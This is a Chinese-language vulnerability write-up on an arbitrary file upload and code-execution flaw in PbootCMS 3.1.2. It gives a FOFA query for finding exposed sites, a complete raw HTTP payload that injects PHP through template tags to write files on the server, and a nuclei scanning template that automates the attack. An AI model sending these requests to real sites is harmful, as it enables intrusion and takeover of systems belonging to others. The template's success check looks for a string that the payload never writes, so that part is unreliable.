PbootCMS pboot存在任意文件上传漏洞
一、漏洞简介
PbootCMS是全新内核且永久开源免费的PHP企业网站开发建设管理系统,是一套高效、简洁、 强悍的可免费商用的PHP CMS源码,能够满足各类企业网站开发建设的需要。在PbootCMS V3.1.2版本中存在任意文件漏洞,导致攻击者可利用该漏洞远程执行命令。
二、影响版本
- PbootCMS 3.1.2
三、资产测绘
- fofa
app="PBOOTCMS" - 特征
四、漏洞复现
POST /?tag/index=&tag={pbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)}(123){/pbhome/Indexoot:if}&tagstpl=news.html&lnoc2tspfar1_ue HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Connection: close
Cookie: lg=call_user_func
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
1[]=ayaq.txt&1[]=YXk=&2=$a,$b&3=return var_dump(file_put_contents($b,base64_decode($a)));上传文件地址
/ayaq.txt
如下nuclei脚本有安云安全内部群鲁鲁师傅提供:
id: pbootcms-uploadfile
info:
name: pbootcms-uploadfile
author: lulu
severity: high
description: pbootcms-任意文件上传
http:
- raw:
- |
POST /?tag/index=&tag={pbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)}(123){/pbhome/Indexoot:if}&tagstpl=news.html&lnoc2tspfar1_ue HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Connection: close
Cookie: lg=call_user_func
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
1[]=ayaq.txt&1[]=YXk=&2=$a,$b&3=return var_dump(file_put_contents($b,base64_decode($a)));
- |
GET /ayaq.txt HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip
matchers:
- type: dsl
dsl:
- status_code_2==200 && contains_all(body_2,"360nbplus1")